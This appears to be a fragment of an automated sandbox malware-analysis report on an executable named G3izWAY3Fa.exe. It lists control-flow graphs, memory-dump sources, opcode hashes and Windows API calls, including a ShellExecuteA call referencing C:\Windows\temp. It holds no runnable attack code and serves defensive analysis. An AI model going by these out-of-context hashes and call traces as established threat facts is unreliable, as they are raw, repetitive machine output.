                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                                                                              • Instruction ID: 736e54d1ea8bc2ffbcc58a3ee687e8f06aed80bce92bf0dad63538ea203c4f31
                                                                                              • Opcode Fuzzy Hash: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                                                                              • Instruction Fuzzy Hash: 77913271D00229CBDF28CF98C844BADBBB1FF44305F15816AD856BB281D7789A86DF54

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 608 4062f4-4062f8 609 4062fe-406302 608->609 610 4063af-4063be 608->610 611 406843 609->611 612 406308-40631c 609->612 613 406614-406629 610->613 614 406846-40684a 611->614 617 4067e2-4067ec 612->617 618 406322-40632b 612->618 615 406643-406659 613->615 616 40662b-406641 613->616 620 40665c-406663 615->620 616->620 619 40682e-406841 617->619 621 406330-406360 618->621 622 40632d 618->622 619->614 623 406665-406669 620->623 624 40668a-406696 620->624 621->610 629 405e2c-405e35 621->629 622->621 626 406818-406822 623->626 627 40666f-406687 623->627 624->629 626->619 627->624 629->611 630 405e3b 629->630 631 405e42-405e46 630->631 632 405f82-405fa3 630->632 633 405ee7-405eeb 630->633 634 405f57-405f5b 630->634 631->619 637 405e4c-405e59 631->637 632->613 635 405ef1-405f0a 633->635 636 406797-4067a1 633->636 638 405f61-405f75 634->638 639 4067a6-4067b0 634->639 640 405f0d-405f11 635->640 636->619 637->611 641 405e5f-405ea5 637->641 642 405f78-405f80 638->642 639->619 640->633 643 405f13-405f19 640->643 644 405ea7-405eab 641->644 645 405ecd-405ecf 641->645 642->632 642->634 646 405f43-405f55 643->646 647 405f1b-405f22 643->647 648 405eb6-405ec4 GlobalAlloc 644->648 649 405ead-405eb0 GlobalFree 644->649 650 405ed1-405edb 645->650 651 405edd-405ee5 645->651 646->642 652 405f24-405f27 GlobalFree 647->652 653 405f2d-405f3d GlobalAlloc 647->653 648->611 654 405eca 648->654 649->648 650->650 650->651 651->640 652->653 653->611 653->646 654->645
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                                                                              • Instruction ID: c975835c63a62796fcb7e955cfffcd5e326eaa1512836fcadbce1623bdfadb04
                                                                                              • Opcode Fuzzy Hash: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                                                                              • Instruction Fuzzy Hash: AF816671D00229CFDF24CFA8C8447AEBBB1FB44305F25816AD856BB281C7789A86DF54

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 655 405df9-405e1c 656 405e26-405e29 655->656 657 405e1e-405e21 655->657 659 405e2c-405e35 656->659 658 406846-40684a 657->658 660 406843 659->660 661 405e3b 659->661 660->658 662 405e42-405e46 661->662 663 405f82-406629 661->663 664 405ee7-405eeb 661->664 665 405f57-405f5b 661->665 668 405e4c-405e59 662->668 669 40682e-406841 662->669 673 406643-406659 663->673 674 40662b-406641 663->674 666 405ef1-405f0a 664->666 667 406797-4067a1 664->667 670 405f61-405f75 665->670 671 4067a6-4067b0 665->671 675 405f0d-405f11 666->675 667->669 668->660 676 405e5f-405ea5 668->676 669->658 677 405f78-405f80 670->677 671->669 678 40665c-406663 673->678 674->678 675->664 679 405f13-405f19 675->679 680 405ea7-405eab 676->680 681 405ecd-405ecf 676->681 677->663 677->665 682 406665-406669 678->682 683 40668a-406696 678->683 684 405f43-405f55 679->684 685 405f1b-405f22 679->685 686 405eb6-405ec4 GlobalAlloc 680->686 687 405ead-405eb0 GlobalFree 680->687 688 405ed1-405edb 681->688 689 405edd-405ee5 681->689 690 406818-406822 682->690 691 40666f-406687 682->691 683->659 684->677 693 405f24-405f27 GlobalFree 685->693 694 405f2d-405f3d GlobalAlloc 685->694 686->660 695 405eca 686->695 687->686 688->688 688->689 689->675 690->669 691->683 693->694 694->660 694->684 695->681
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                                                                              • Instruction ID: 0ba87498709856dc17a0c5f751d6ecfe3ae25d7b1153355424f504aba8ac83cf
                                                                                              • Opcode Fuzzy Hash: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                                                                              • Instruction Fuzzy Hash: B4817772D04229CBDF24CFA8C8447AEBBB0FB44305F25816AD856BB2C0D7785A86DF44

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 696 406247-40624b 697 406269-4062ac 696->697 698 40624d-406264 696->698 699 406614-406629 697->699 698->699 700 406643-406659 699->700 701 40662b-406641 699->701 702 40665c-406663 700->702 701->702 703 406665-406669 702->703 704 40668a-406696 702->704 705 406818-406822 703->705 706 40666f-406687 703->706 710 406843 704->710 711 405e3b 704->711 708 40682e-406841 705->708 706->704 712 406846-40684a 708->712 710->712 713 405e42-405e46 711->713 714 405f82-405fa3 711->714 715 405ee7-405eeb 711->715 716 405f57-405f5b 711->716 713->708 719 405e4c-405e59 713->719 714->699 717 405ef1-405f0a 715->717 718 406797-4067a1 715->718 720 405f61-405f75 716->720 721 4067a6-4067b0 716->721 722 405f0d-405f11 717->722 718->708 719->710 723 405e5f-405ea5 719->723 724 405f78-405f80 720->724 721->708 722->715 725 405f13-405f19 722->725 726 405ea7-405eab 723->726 727 405ecd-405ecf 723->727 724->714 724->716 728 405f43-405f55 725->728 729 405f1b-405f22 725->729 730 405eb6-405ec4 GlobalAlloc 726->730 731 405ead-405eb0 GlobalFree 726->731 732 405ed1-405edb 727->732 733 405edd-405ee5 727->733 728->724 734 405f24-405f27 GlobalFree 729->734 735 405f2d-405f3d GlobalAlloc 729->735 730->710 736 405eca 730->736 731->730 732->732 732->733 733->722 734->735 735->710 735->728 736->727
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                                                                              • Instruction ID: 47c5cb8fc101d284839cddc633a7ca9263ac2e2456f843b1234a04abf02d33d1
                                                                                              • Opcode Fuzzy Hash: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                                                                              • Instruction Fuzzy Hash: 0C713371D00229CBDF28CFA8C844BADBBF1FB44305F15806AD816BB281D7785A86DF54

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 737 406365-406369 738 406370-406387 737->738 739 40636b-4063be 737->739 741 406614-406629 738->741 739->741 742 406643-406659 741->742 743 40662b-406641 741->743 745 40665c-406663 742->745 743->745 746 406665-406669 745->746 747 40668a-406696 745->747 748 406818-406822 746->748 749 40666f-406687 746->749 753 406843 747->753 754 405e3b 747->754 751 40682e-406841 748->751 749->747 755 406846-40684a 751->755 753->755 756 405e42-405e46 754->756 757 405f82-405fa3 754->757 758 405ee7-405eeb 754->758 759 405f57-405f5b 754->759 756->751 762 405e4c-405e59 756->762 757->741 760 405ef1-405f0a 758->760 761 406797-4067a1 758->761 763 405f61-405f75 759->763 764 4067a6-4067b0 759->764 765 405f0d-405f11 760->765 761->751 762->753 766 405e5f-405ea5 762->766 767 405f78-405f80 763->767 764->751 765->758 768 405f13-405f19 765->768 769 405ea7-405eab 766->769 770 405ecd-405ecf 766->770 767->757 767->759 771 405f43-405f55 768->771 772 405f1b-405f22 768->772 773 405eb6-405ec4 GlobalAlloc 769->773 774 405ead-405eb0 GlobalFree 769->774 775 405ed1-405edb 770->775 776 405edd-405ee5 770->776 771->767 777 405f24-405f27 GlobalFree 772->777 778 405f2d-405f3d GlobalAlloc 772->778 773->753 779 405eca 773->779 774->773 775->775 775->776 776->765 777->778 778->753 778->771 779->770
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                                                                              • Instruction ID: aa40489b15165fca9e2d73c9723ecf3d5b4a768092768a0400057c9dc9ec6b69
                                                                                              • Opcode Fuzzy Hash: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                                                                              • Instruction Fuzzy Hash: F6714471D04229CFDF28CF98C844BAEBBB1FB44305F25816AD816BB281D7785A86DF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                                                                              • Instruction ID: f7c6f07f586ed293a1c67bf574783cb577a0acbc2814a7f5ecfd539a56c9ebac
                                                                                              • Opcode Fuzzy Hash: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                                                                              • Instruction Fuzzy Hash: AF715671D00229CBDF28CF98C844BADBBB1FF44305F15816AD816BB281C7785A46DF54
                                                                                              APIs
                                                                                              • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Windows\temp,?), ref: 00401E07
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecuteShell
                                                                                              • String ID: C:\Windows\temp
                                                                                              • API String ID: 587946157-823764690
                                                                                              • Opcode ID: 92d2050c37f50ba05e813603419f61aaf560cdca42c4badea36c2296db382889
                                                                                              • Instruction ID: e1c53a3b58ef05eba024da23075f8ab054487d32240d7e587a4224b468346741
                                                                                              • Opcode Fuzzy Hash: 92d2050c37f50ba05e813603419f61aaf560cdca42c4badea36c2296db382889
                                                                                              • Instruction Fuzzy Hash: 87F0C872B04201AAC7516FB59D4AA5E2AA8AB41398F200637F510F61C1D9BD8841A658
                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                              • Instruction ID: 9357c62ddf9e7b3c824d0b87f8e4bad160879ee2cb8093492041203a2cf1b2c1
                                                                                              • Opcode Fuzzy Hash: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                              • Instruction Fuzzy Hash: A301F431724210ABE7295B389D04B2A36ADF710355F10427BF855F66F1D67CDC028B4D
                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 004056B8
                                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                              • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                                                              • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                              • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNELBASE(?,004054A0,?,?,?), ref: 00405699
                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 004056AB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                              • Instruction ID: 6114cdacef20a61ffb1e354697c2a54f95ff97830a0005cd613603337fba2c3c
                                                                                              • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                              • Instruction Fuzzy Hash: 72C04CB1808501BBD6015B24DF0D81F7B66EB51321B508F35F56DE00F1C7355CA6DA1A
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EA7,000000FF,00000004,00000000,00000000,00000000), ref: 00403065
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                              • Instruction ID: cf04fcf122da41e7499d2f74f705547a68887b1f6d4f421339b8fb166199a16f
                                                                                              • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                              • Instruction Fuzzy Hash: 2AE08C32901118BBCF205E619C00EAB3B5CEB053A2F00C032FA14E52A0D630EA11DBAA
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,?), ref: 0040308E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
